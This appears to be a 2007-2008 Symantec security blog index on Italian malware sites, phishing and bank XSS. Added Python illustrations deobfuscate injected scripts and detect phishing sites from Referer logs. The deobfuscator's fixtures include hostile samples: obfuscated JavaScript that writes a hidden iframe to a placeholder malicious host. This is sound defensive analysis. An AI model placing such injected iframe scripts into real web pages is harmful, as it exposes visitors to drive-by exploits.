
Security Response

Andrea DelMiglio | 11 Apr 2008 | 0 comments

Symantec has been notified that the Web site ladestra.info, a site related to a right-wing Italian political party, has been compromised. The Web site is hosting a malicious iframe that leads to a typical browser exploit served by the Neosploit toolkit, which installs the newest version of Trojan.Mebroot on the exploited computer.

Using elections as a channel for spreading malicious code is something we have already seen (...

Andrea DelMiglio | 01 Apr 2008 | 0 comments

Symantec is tracking more and more high-traffic Web sites that are compromised and then used to spread malicious code. After the breach our MSS team spotted on Tata, we have been notified of another Web site with a similar issue.



Today the Italian Web site www.emule-italia.it was found to be compromised and hosting an obfuscated script.

The script, when deobfuscated, revealed an iframe pointing to
http://[REMOVED]...
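As an added illustration (not code from the original post, and not the script found on the site), the following Python routine folds the string-building tricks such droppers typically rely on (unescape(), String.fromCharCode(), literal concatenation and a temporary variable) back into plain literals, then pulls the iframe destination out of whatever is handed to document.write() or document.writeln(). The three sample scripts are constructed for the example and the host malicious.example is a placeholder, not the real [REMOVED] destination.

```python
import html
import json
import re
from typing import List
from urllib.parse import unquote

# Constructed samples, not the script actually found on www.emule-italia.it.
# All three write the same hidden iframe, each with a different string trick.
IFRAME_HTML = ('<iframe src="http://malicious.example/in.cgi?3" width=1 height=1 '
               'style="visibility:hidden"></iframe>')

SAMPLE_UNESCAPE = ('var x0=unescape("%s");document.write(x0);'
                   % "".join("%%%02X" % b for b in IFRAME_HTML.encode("ascii")))
SAMPLE_CHARCODE = ('document.writeln(String.fromCharCode(%s));'
                   % ",".join(str(ord(c)) for c in IFRAME_HTML))
SAMPLE_CONCAT = ('document.write("<ifra"+"me src=\'http://malicious.example/x\' "'
                 '+"width=1 height=1>"+"</iframe>");')

# A double-quoted JS string literal; backslash escapes allowed inside.
_DQ = r'"((?:[^"\\]|\\.)*)"'
_UNESCAPE = re.compile(r'unescape\(\s*' + _DQ + r'\s*\)')
_CHARCODE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]+?)\s*\)')
_CONCAT = re.compile(_DQ + r'\s*\+\s*' + _DQ)
_ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*' + _DQ + r'\s*;')
_WRITE = re.compile(r'document\.write(?:ln)?\(\s*' + _DQ + r'\s*\)')
_IFRAME_SRC = re.compile(r'<iframe[^>]*\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def _decode(body: str) -> str:
    # JSON string syntax covers the escapes this tool produces (\" \\ \uXXXX);
    # JS-only escapes such as \x41 are deliberately not handled here.
    return json.loads('"' + body + '"')


def _literal(text: str) -> str:
    # Re-emit as a double-quoted JS literal so the next pass keeps matching.
    return json.dumps(text)


def deobfuscate(script: str, max_rounds: int = 20) -> str:
    """Fold unescape(), String.fromCharCode(), "a"+"b" and var x="..." into plain literals."""
    for _ in range(max_rounds):
        before = script
        script = _UNESCAPE.sub(lambda m: _literal(unquote(_decode(m.group(1)))), script)
        script = _CHARCODE.sub(
            lambda m: _literal("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())),
            script)
        script = _CONCAT.sub(lambda m: _literal(_decode(m.group(1)) + _decode(m.group(2))), script)
        m = _ASSIGN.search(script)
        if m:
            name, value = m.group(1), _decode(m.group(2))
            rest = script[:m.start()] + script[m.end():]
            # Inline the variable wherever it appears as a whole word. Good enough for
            # one-shot droppers; a real tool would parse the JavaScript instead.
            script = re.sub(r'\b%s\b' % re.escape(name), lambda _m: _literal(value), rest)
        if script == before:
            break
    return script


def extract_iframe_targets(script: str) -> List[str]:
    """Return the src of every iframe written by document.write()/writeln() in the script."""
    targets = []
    for m in _WRITE.finditer(deobfuscate(script)):
        written = _decode(m.group(1))
        targets.extend(html.unescape(src) for src in _IFRAME_SRC.findall(written))
    return targets


if __name__ == "__main__":
    for sample in (SAMPLE_UNESCAPE, SAMPLE_CHARCODE, SAMPLE_CONCAT):
        print(extract_iframe_targets(sample))
```

The fixed-point loop matters: real droppers nest these tricks (a fromCharCode() inside an unescape() inside a concatenation), so one pass is rarely enough. Anything that still is not a plain literal after the loop (eval() of a decoded blob, packed functions) needs a proper JavaScript interpreter, which is exactly why the original post was analysed by hand.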

Andrea DelMiglio | 22 Feb 2008 | 0 comments

Earlier this afternoon in Italy hundreds of thousands of people received an email from a “friend” stating (approximately) the following:

You’re under investigation! Hide everything and be quick!!! Your name appeared this morning together with 150 more persons on the website of CAFF in Rome. Check it by yourself, you’re on January’s list: the website is the following: http://www.site.tld/caff/

The email is relatively convincing and Symantec believes many users have actually visited the Web site:

The Web site look and feel is very similar to other Italian government Web sites and also the choice of the...

Andrea DelMiglio | 10 Jan 2008 | 0 comments

The "referer" [sic] header is generally used to track back-links in order to understand how a certain Web site is being reached by its visitors (hyperlinks on other Web sites, search engines, etc.). According to RFC 2616, “...the Referer request-header field allows the client to specify, for the server's benefit, the address (URI) of the resource from which the Request-URI was obtained (the "referrer", although the header field is misspelled).”

In the online fraud arena, the referrer field can also be used to detect new phishing Web sites. Let’s use as an example the following phishing site (which also happens to be a Rock Phish attack):

...
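The excerpt stops before the worked example, so here is an added illustration (not the author's code) of the detection the paragraph describes: phishing pages routinely hot-link images and stylesheets from the genuine site, and victims are often redirected to the real login page afterwards, so the bank's own access log shows requests whose Referer points at the phishing page. The domain names, the allow-list of expected referrers and the log lines below are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import urlsplit

# Assumed names for the protected site and for third parties known to link to it.
OWN_DOMAIN = "well-known-bank.example"
KNOWN_REFERRER_HOSTS = {"www.google.com", "www.google.it"}

# Static resources a phishing page typically hot-links from the genuine site.
EMBEDDABLE = (".gif", ".jpg", ".png", ".css", ".js")

# NCSA combined log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2008:14:02:11 +0100] "GET /images/logo.gif HTTP/1.1" 200 4521 "http://www.well-known-bank.example/login.asp" "Mozilla/4.0"',
    '10.0.0.6 - - [10/Jan/2008:14:02:13 +0100] "GET /images/logo.gif HTTP/1.1" 200 4521 "http://203.0.113.7/~user/bank/login.php" "Mozilla/4.0"',
    '10.0.0.7 - - [10/Jan/2008:14:03:40 +0100] "GET /css/main.css HTTP/1.1" 200 1200 "http://203.0.113.7/~user/bank/login.php" "Mozilla/4.0"',
    '10.0.0.8 - - [10/Jan/2008:14:04:02 +0100] "GET /login.asp HTTP/1.1" 200 8800 "http://www.google.it/search?q=bank" "Mozilla/4.0"',
    '10.0.0.9 - - [10/Jan/2008:14:05:17 +0100] "GET /login.asp HTTP/1.1" 200 8800 "-" "Mozilla/4.0"',
    '10.0.0.6 - - [10/Jan/2008:14:05:44 +0100] "GET /login.asp HTTP/1.1" 200 8800 "http://203.0.113.7/~user/bank/login.php" "Mozilla/4.0"',
    '10.0.0.10 - - [10/Jan/2008:14:06:00 +0100] "GET /images/logo.gif HTTP/1.1" 200 4521 "http://wellknown-bank.secure-update.example/bank/index.php" "Mozilla/4.0"',
    '10.0.0.11 - - [10/Jan/2008:14:06:30 +0100] "GET /css/main.css HTTP/1.1" 200 1200 "https://secure.well-known-bank.example/home.asp" "Mozilla/4.0"',
]


def referrer_host(referer: str) -> str:
    """Host part of the Referer value, or '' when the header was absent ('-')."""
    if referer in ("", "-"):
        return ""
    return (urlsplit(referer).hostname or "").lower()


def is_expected_referrer(host: str) -> bool:
    return (host == OWN_DOMAIN or host.endswith("." + OWN_DOMAIN)
            or host in KNOWN_REFERRER_HOSTS)


def find_candidate_phishing_sites(lines: List[str]) -> Dict[str, dict]:
    """Group hits by unexpected referring host; hot-linked static assets are the strongest signal."""
    found = defaultdict(lambda: {"hits": 0, "hotlinked": set(), "referer_urls": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another format rather than abort
        host = referrer_host(m.group("referer"))
        if not host or is_expected_referrer(host):
            continue
        entry = found[host]
        entry["hits"] += 1
        entry["referer_urls"].add(m.group("referer"))  # full phishing URL, useful for takedown
        path = m.group("path").split("?", 1)[0]
        if path.lower().endswith(EMBEDDABLE):
            entry["hotlinked"].add(path)
    return {host: {"hits": e["hits"],
                   "hotlinked": sorted(e["hotlinked"]),
                   "referer_urls": sorted(e["referer_urls"])}
            for host, e in found.items()}


if __name__ == "__main__":
    for host, info in find_candidate_phishing_sites(SAMPLE_LOG).items():
        print(host, info)
```

Two caveats a fraud team should keep in mind: the Referer is set by the client, so it can be stripped (browsers on HTTPS-to-HTTP transitions, privacy proxies) or forged, which makes a hit a lead to verify rather than proof; and a phishing kit that copies the assets instead of hot-linking them leaves only the post-login redirect as a signal, which is why the login page is tracked as well.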

Andrea DelMiglio | 08 Jan 2008 | 0 comments

As discussed in the past, cross-site scripting (XSS) can be exploited by phishers to build really effective attacks. Today we have analyzed another similar attack that includes some enhanced features. The attack was exploiting an injection flaw in an Internet banking application, specifically located in the module used to display warning messages to users.

The function took a single GET parameter:

https://www.well-known-bank.com/popup.asp?msg=[ASCII_encoded_message_to_display]

And then returned a page with the following in the body:

document.writeln([decoded_messages]);

Obviously the aim here is to have a single page display warnings that are available to every module in the application. Because the input was not properly sanitized the attackers used...

Andrea DelMiglio | 05 Nov 2007 | 0 comments

Anonymous proxy services are online applications that enable users to surf the Web with enhanced privacy. These applications act as an SSL proxy between the user and the Web site to be visited, thus masking the IP address and providing additional privacy features, such as referrer hiding, script removal, cookie removal, and URL encoding. Proxify is one provider of these services, but many more are available on the Internet.

Although we believe online privacy is something we always need to take care of, the use of these...

Andrea DelMiglio | 29 Oct 2007 | 0 comments

As anticipated in my first blog post, email service providers play a central role in the battle against online fraud. This is because they are often the only organizations to own the data needed to support financial institutions and law enforcement agencies in prosecuting criminals.

Most phishing sites are hosted on compromised Web servers and in the past, stolen accounts were stored in local log files that phishers saved under rather standard filenames (like “data.log” or “cc.txt,” where “cc” obviously stands for credit card). Web servers with directory listings enabled, together with phishing kit analysis, quickly made this simple technique ineffective, because financial institutions were able to read those files as well. Therefore, they were able to block stolen Internet banking accounts and credit cards, thus...

Andrea DelMiglio | 30 Jul 2007 | 0 comments

Since May, phishing attacks against Italian banks have been a visible but rather limited phenomenon. Most financial institutions reacted quickly, setting up proper fraud management processes, education campaigns for end users and technical countermeasures since early 2006. But in the last three months, Italian mailboxes have been flooded by millions of phishing emails, moving the problem to the next level.

Figure: Number of single URLs per month (July 07 data includes attacks until July 27th)

As the graph illustrates, the number of attacks grew 14 times from the 2006 peak (127 in August) to the current 2007 peak (1735 last May). Attack...